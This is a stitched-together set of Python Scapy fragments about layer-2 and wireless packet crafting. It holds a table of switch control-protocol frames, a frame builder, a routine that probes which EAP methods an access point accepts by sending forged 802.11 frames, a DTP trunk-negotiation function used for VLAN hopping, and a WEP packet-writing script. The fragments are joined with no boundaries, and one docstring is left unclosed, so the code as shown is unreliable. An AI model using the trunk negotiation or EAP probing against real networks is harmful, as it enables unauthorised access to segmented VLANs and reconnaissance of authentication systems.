'lacp' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x01') / Raw('\0' * 109) },
'marker' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x02') / Raw('\0' * 49) },
'oam' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x03') / Raw('\0' * 49) },
'lbd' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\xFF') / Raw('\0' * 49) },
'cdp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2000) / Raw('\0' * 370) },
'pagp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x0104) / Raw('\0' * 62) },
'udld' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x0111) / Raw('\0' * 60) },
'vtp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2003) / Raw('\0' * 77) },
'pvst' : { 'mac' : '01:00:0c:cc:cc:cd', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x010b) / STP() },
'dtp' : { 'mac' : '01:00:0c:cc:cc:cd', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2004) / Raw('\0' * 31) },
'gvrp' : { 'mac' : '01:80:c2:00:00:21', 'load' : LLC(dsap = 0x42, ssap = 0x42, ctrl = 0x03) / Raw('\x00\x01') / Raw('\0' * 41) },
'gmrp' : { 'mac' : '01:80:c2:00:00:20', 'load' : LLC(dsap = 0x42, ssap = 0x42, ctrl = 0x03) / Raw('\x00\x01') / Raw('\0' * 41) },
'dot1x' : { 'mac' : '01:80:c2:00:00:03', 'type' : 0x888e, 'load' : Raw('\0' * 64) },
'eaps' : { 'mac' : '00:e0:2B:00:00:04', 'load' : LLC() / SNAP(OUI = 0x00E02B, code = 0x00BB) / Raw('\0' * 84) },
'erps' : { 'mac' : '01:19:a7:00:00:01', 'type' : 0x8902, 'load' : Raw('\x00\x28') / Raw('\0' * 35) },
}
def protocol_frame(protocol, source='unicast', vlans = []):
""" Create a frame that has the minimum fields to be recognized as a determined protocol.
It's not intended to be a valid PDU, only to be seen as one by the switch filter.
def l2_frame_from_to(source, destination, vlans = [], seq = 10, size = 64, pattern = '\0', framing = "Ethernet II"):
""" Create a frame using interfaces MACs.
@param source Name of the source interface, or source MAC address.
It can also be:
* 'unicast' to use a random unicast address as source MAC.
@param destination Name of the destination interface, or destination MAC address.
It can also be:
* 'broadcast' to use 'FF:FF:FF:FF:FF:FF' as destination MAC.
* 'multicast' to use a random multicast address as destination MAC.
* 'unicast' to use a random unicast address as destination MAC.
@param vlans [optional] List of VLAN Tags.
List can be composed by single integer representing VLAN, or tuple (int, int) for VLAN and prio.
Ex: [(100, 3), 20] will add two tags, one with VLAN 100, prio 3 and another with VLAN 20, prio 0.
@param seq [optional] Number of sequence
@param size [optional] Size of created frame. A padding based on 'pattern' is added to complete
the frame until size is reached (counting 4 bytes of FCS)
@param pattern [optional] Pattern string used to fill payload. Default is '\0'.
* 'random' to fill the payload with random bytes.
@param framing [optional] Type of frame:
* "Ethernet II" : Ethertype > 1535 and hold information about next layer.
* "802.3" : Ethertype <= 1500 represent payload length. Next header is LLC.
"""
if "eth" in destination:
dst_mac = mac_address(destination)
elif destination == 'broadcast':
dst_mac = 'FF:FF:FF:FF:FF:FF'
elif destination == 'multicast':
dst_mac = str(random_mac('multicast'))
elif destination == 'unicast':
dst_mac = str(random_mac('unicast'))
else:
dst_mac = str(destination)
if "eth" in source:
src_mac = str(mac_address(source))
elif source == 'unicast':
src_mac = str(random_mac('unicast'))
else:
src_mac = str(source)
# When the next layer is Dot1Q, Dot3 will be evaluated as Ether anyway (0x8100 > 1536),
# To keep consistency between creation and dissection, already use Ether even for 802.3 framing.
# The difference will be made as Dot1Q will be followed by LLC header.
if framing == "Ethernet II" or vlans:
frame = Ether(src = src_mac, dst = dst_mac)
elif framing == "802.3":
frame = Dot3(src = src_mac, dst = dst_mac)
else:
raise ValueError("Excpected only 'Ethernet II' or '802.3' as framing types.")
for v in vlans:
if type(v) == int:
frame = frame / Dot1Q(vlan = v)
elif type(v) == tuple:
frame = frame / Dot1Q(vlan = v[0], prio = v[1])
else:
raise TypeError("Expected list with int or tuple for VLANs parameter.")
if framing == "802.3":
frame = frame / LLC() / SNAP()
if seq != None:
frame = frame / L2T(l2t_seq = seq)
return add_payload(frame, size, pattern)
def check_eap_type(self,
eaptype,
outer_identity='user',
eapol_start=False):
"""
Check that an eaptype is supported.
errDict = {
0:"supported",
1:"not supported",
2:"could not determine",
3:"identity rejected"
}
"""
eapid = randint(1, 254)
if eapol_start:
eapol_start_request = RadioTap() / Dot11(
FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
type=2,
subtype=8) / Dot11QoS() / LLC(
dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) / EAPOL(
version=1, type=1)
self.sequence += 1
i = 0
while i < 3:
sendp(eapol_start_request, iface=self.interface, verbose=False)
sniff(iface=self.interface,
store=0,
timeout=RESPONSE_TIMEOUT,
stop_filter=self.__stopfilter__)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if 'type' in fields and fields['type'] == 1 and fields[
'code'] == 1:
i = 0
eapid = fields['id']
break
i += 1
if i == 2:
return 2
eap_identity_response = RadioTap() / Dot11(
FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
type=2,
subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP(
code=0x888e) / EAPOL(version=1, type=0) / EAP(
code=2, type=1, id=eapid, identity=outer_identity)
self.sequence += 1
eap_legacy_nak = RadioTap() / Dot11(
FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
type=2,
subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP(
code=0x888e) / EAPOL(version=1, type=0, len=6) / EAP(
code=2, type=3, id=eapid + 1, eap_types=[eaptype])
self.sequence += 1
for i in range(0, 3):
sendp(eap_identity_response, iface=self.interface, verbose=False)
sniff(iface=self.interface,
store=0,
timeout=RESPONSE_TIMEOUT,
stop_filter=self.__stopfilter__)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if fields['code'] == 4: # 4 is a failure
return 3
if 'type' in fields and fields['type'] == eaptype:
return 0
i = 0
break
if i == 2:
return 2
for i in range(0, 3):
sendp(eap_legacy_nak, iface=self.interface, verbose=False)
sniff(iface=self.interface,
store=0,
timeout=RESPONSE_TIMEOUT,
stop_filter=self.__stopfilter__)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer(EAP).fields
if 'type' in fields and fields['type'] == eaptype:
return 0
else:
return 1
return 2
def negotiate_trunk(iface=conf.iface, mymac="80:00:0b:12:95:fd"):
print "Trying to negotiate a trunk on interface %s" % iface
stat=DTPStatus()
p = Dot3(src=mymac, dst="8C:60:4F:DC:CF:FC")/LLC()/SNAP()/DTP(tlvlist=[DTPDomain(),stat,DTPType(),DTPNeighbor(neighbor=mymac)])
sendp(p)
print stat.show()
from scapy.sendrecv import sendp
from scapy.layers.inet import IP, ICMP
from scapy.all import hexdump
from scapy.utils import rdpcap, wrpcap
from pyDot11.__init__ import wepEncrypt
from pyDot11.lib.utils import Pcap
from pyDot11.lib.wep import Wep
#Sending from a pcap
#wepPkts = rdpcap('PCAPs/ICMPs/wep_pings.pcap')
#wepPkts.summary()
#input = wepPkts.__class__(str(wepPkts)[0:-4])
#print(input.summary())
#sendp(wepPkts)
# Sending a simple packet
sender = '08:00:27:c6:e4:20'
dest = '08:00:27:1b:8b:a3'
packet = Dot11(addr1=dest, addr2=sender, addr3=sender) / LLC() / SNAP() / IP(
src="192.168.3.7", dst="192.168.3.5") / ICMP() / "Hello!"
print(packet.summary())
for x in range(19):
wrpcap('dot11-ICMP.pcap', packet, append=True)
#print(packet.show())
#sendp(packet)
#encPkt = wepEncrypt(packet,'0123456789')
#print(encPkt.summary())
#print(encPkt.show())
#sendp(encPkt)